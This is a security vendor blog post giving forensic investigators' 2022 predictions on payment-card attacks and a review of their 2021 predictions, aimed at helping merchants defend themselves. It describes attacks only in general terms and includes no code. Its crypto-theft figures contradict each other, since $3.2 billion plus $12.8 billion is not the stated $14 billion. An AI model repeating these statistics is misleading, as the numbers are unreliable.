BLOG HOME > 2022 Forensic Predictions

2022 Forensic Predictions

SecurityMetrics Forensic Investigators have witnessed the rise and fall of popular attack trends over 20 consecutive years.

Download the latest guide to PCI compliance

Download Now

Comparing 2021 forensic trends to previous years, SecurityMetrics’ Forensic Investigators conducted more investigations of e-commerce environments than of point-of-sale (POS) environments.

Here are our 2022 Forensic Predictions.

1. Payment iframe breach via browser vulnerability or zero-day attack

SecurityMetrics forensic investigators have continued to see a surge in iFrame compromises. In the typical iFrame compromise, a customer would attempt to make a purchase on an e-commerce website but are shown an error message prompting them to re-enter their credit card information. The customer’s first attempt would go to the attacker. The second would go to the processor. 

However, we predict that there will be severe payment iFrame breaches with payment completion via zero-day attacks. By utilizing some of these zero-day attacks (especially ones that use JavaScript), the more sophisticated attack environment would only need a customer to enter their information once. The attacker would be able to collect their payment information and then send this information off to the processor.

There are all sorts of attacks occurring with Node.js and AngularJS, where attackers are trying hard to exploit some of these vulnerabilities.

We’re going to see iFrames broken through this method, where they use the browser itself to capture credit card data.

2. Mobile devices will become a primary target of credit card skimmers

Our second prediction for this next year is that we’ll start seeing mobile devices as the primary targets of skimmers (and other types of data breaches).

Mobile device processing was once considered to be immune to data breaches.

That’s not the case anymore, especially from the consumer side. There was a hacker tool called Enter. This tool was designed to insert a skimmer on the checkout page inside of a desktop browser. Recently, this tool has been reconfigured (or remade) into Mobile Enter, which is specifically designed to run on your phone instead of a desktop.

With the increase of online shopping occurring on phones, we’ll see more attacks and exploits on mobile devices.

3. Increase in use of anti-forensic techniques of credit card skimmers

The harder it is for a forensic analyst to detect an attack, the longer that attack goes on, with even more cardholder data being lost.

The range of tools being used covers data hiding (e.g., rootkits, encryption, steganography), artifact wiping (e.g., disk cleaner, free space, and memory cleaners, prophylactic), trial obfuscation (e.g., log cleaners, spoofing, misinformation, zombied accounts, Trojan commands), and attacks against the CF process/tools (e.g., file signature altering, hash fooling, nested directories).

We’re going to see more of this occurring on the mobile platform.

This is even more reason to regularly update your defensive tools (e.g., antivirus), since these tools will try to identify some of these attacks to the best of their ability.

4. Rise of ransomware without encryption

Ransomware traditionally will lock a computer and encrypt its files. If you want to access your files again, you have to pay the ransom.

However, there will be a shift from solely encrypting files towards collecting and holding onto the confidentiality of your files that are put at ransom.

Hackers will disclose that they’ve captured your data, and if you don’t want your competitors to receive this information, for this information to be publicly disclosed, or for the sensitive information to be sold on the dark web, you will need to pay the ransom.

This shift is because more businesses have been following cyber security best practices, ensuring that they have backups that are current and disconnected from their network.

Because of this, some organizations never have to pay the ransom, so they’ve moved on to extortion.

In one case, we saw that a company paid to have their data unlocked, then paid to have the attackers not publish the data. They then came back six months later saying something like “We still have your data, we’re going to need another X amount of Bitcoin to keep this information confidential.” The bad thing is that they still have your data and could continue requesting more money.

If you want to learn more about these predictions, check out this webinar. 

Forensic Webinar: What Happened in 2019 & Predictions for 2020

Watch Here

How did we do on our predictions from 2021? Here are last year’s predictions and results.

Prediction 1. Hackers will increasingly target payment iFrames 

There seemed to be the idea that if you put an iframe in place, that was enough of a security enhancement that you could consider your data secure. To a hacker, iframes were just another opportunity. 

We did see all kinds of iframe attacks, including a complete bypass of the iframe. In a lot of iframe attacks, the threat actors would come in posing as regular customers, grab the card data, and waltz right back out with it. 

Now, don't get us wrong, iframes are still a very important part of your layered security and we're not discouraging the use of iframes. In fact, we encourage you to use iframes. They can be very secure. But you also need to protect your iframes. If your website is secure, it's kind of like putting a safe in your house, but not locking your front door. You still want to make sure your front door is locked.

Prediction 2. Increases in domain name obfuscation hacks

Domain name obfuscation hacks exploit Unicode; a combination of symbols from many writing systems, including Greek, Latin, and Cyrillic. Unicode characters look indistinguishable from Latin characters. An “O” in each of these languages looks the same but is coded differently, so a URL could look identical, but direct to a totally different website. 

This year, we found several online tools that assisted hackers with obfuscation hacks. We found a manual that was created to help people learn how to hack using Unicode. It was a great tutorial written in simple language that was easy to follow. 

We also found a tool where you can simply cut and paste the URL that you want to copy, put it in the tool, and then the tool generates all sorts of options for you to choose from. Visually the URL looks the same, but the computer will recognize it differently because it contains Unicode characters. It then gives you options to register the domain and sets you up to be able to then use fishing techniques. 

Prediction 3. Increases in slim skimming

Slim skimming is where attackers create a small electronic device that slips right between the reader and the credit card (vs. the old-school, bulky skimmer to a gas pump or an ATM). 

We nailed this one. 

These attacks have increased and they are very hard to detect. There's no hint that anything is wrong because these devices are so small (a few centimeters across) that you can’t see them on the card readers. 

This has been frustrating for merchants, as many of them replaced and updated their gas pump card readers for EMV without realizing the new readers could be solving a problem for the attackers by providing them a convenient power supply. But the defense on this one is really on the merchant to monitor their card scanners.

Prediction 4. An uptick in cryptocurrency thefts

This probably wasn’t a big stretch for anybody. Crypto scammers last year were able to garner $14 billion, illicitly. That's a 79% increase over 2020.

To look at the picture more accurately, of that 14 billion, only 3.2 billion dollars were stolen directly from a crypto exchange where they actually got in and mechanically stole Crypto from someone's account. The remaining, 12.8 billion was actually stolen by way of scams.  

If you want to learn more about these outcomes, check out this webinar. 

Join Thousands of Security Professionals and Subscribe


By: David Ellis
VP, Investigations